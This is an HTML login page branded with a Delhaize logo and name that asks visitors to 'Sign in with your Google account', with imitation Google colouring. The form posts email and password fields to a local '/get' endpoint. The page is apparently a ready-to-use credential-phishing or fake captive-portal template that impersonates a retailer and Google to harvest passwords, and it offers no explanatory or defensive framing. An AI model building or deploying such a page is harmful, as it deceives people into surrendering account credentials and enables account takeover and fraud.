<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #FFC72C;
  margin-right: 100px
}

.brand-name {
  font-size: 75px;
  color: #DD1218;
  margin-left: 10px;
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #DD1218;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #DD1218;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #DD1218;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="300.000000pt" height="234.000000pt" viewBox="0 0 300.000000 234.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,234.000000) scale(0.100000,-0.100000)"
fill="#000000" stroke="none">
<path d="M1115 2302 l-110 -36 -224 -6 -225 -5 -8 -32 -9 -33 -154 0 c-104 0
-155 -4 -155 -11 0 -6 14 -60 32 -120 37 -126 22 -118 180 -93 55 9 101 14
103 12 1 -2 6 -13 9 -25 l7 -23 -233 -2 -233 -3 -9 -83 c-5 -45 -6 -85 -3 -88
2 -3 30 -8 61 -11 l56 -6 0 47 0 46 186 0 186 0 -23 -37 c-63 -104 -70 -113
-82 -107 -7 4 -44 34 -83 65 l-72 58 -34 -52 -35 -52 57 -85 58 -86 -125 -358
c-68 -197 -123 -360 -120 -362 2 -3 39 11 82 31 43 19 80 33 83 31 2 -3 23
-67 46 -144 l43 -140 -106 -168 c-98 -154 -110 -170 -156 -193 -49 -26 -50
-27 -77 -116 -15 -50 -28 -96 -28 -102 0 -10 55 -13 244 -13 l243 0 -19 67
c-10 38 -17 75 -15 83 2 9 68 102 147 209 l143 193 64 -157 c35 -86 63 -158
61 -159 -2 -1 -33 -20 -70 -41 -72 -41 -73 -44 -103 -167 l-7 -28 275 0 274 0
16 85 16 85 -70 110 c-38 60 -69 112 -69 115 0 3 30 60 66 125 l66 120 214 0
214 0 255 124 c140 69 255 123 255 121 0 -2 -76 -151 -169 -332 l-169 -328
-59 -18 c-100 -31 -97 -28 -117 -108 -11 -41 -21 -80 -24 -86 -3 -10 53 -13
261 -13 l266 0 6 58 c14 113 20 126 155 316 74 102 136 186 139 185 3 0 46
-45 95 -100 l89 -100 -31 -72 -30 -72 -84 -19 -84 -18 -29 -77 c-15 -42 -30
-82 -33 -89 -3 -10 49 -12 253 -10 l258 3 54 160 c29 88 53 171 53 185 0 14
-34 162 -75 329 l-75 303 0 307 0 307 -84 72 -85 72 -520 0 -520 0 -7 23 c-10
29 -10 256 0 285 l7 22 518 0 519 0 78 -95 c43 -52 82 -95 86 -95 4 0 8 86 8
190 l0 190 -690 0 c-545 0 -690 -3 -690 -12 0 -7 -9 -86 -18 -175 -18 -156
-18 -168 -1 -330 10 -92 18 -174 19 -180 0 -10 121 -13 570 -13 l570 0 0 -75
0 -75 -660 0 -660 0 -1 53 c-1 134 -27 678 -32 684 -4 3 -22 -8 -42 -26 -39
-34 -46 -37 -40 -18 4 13 59 189 70 225 9 29 2 28 -130 -16z"/>
</g>
</svg>




    <div class="brand-name"><b>DELHAIZE</b></div>
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
 account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot credentials?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account if you forgot your credentials";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
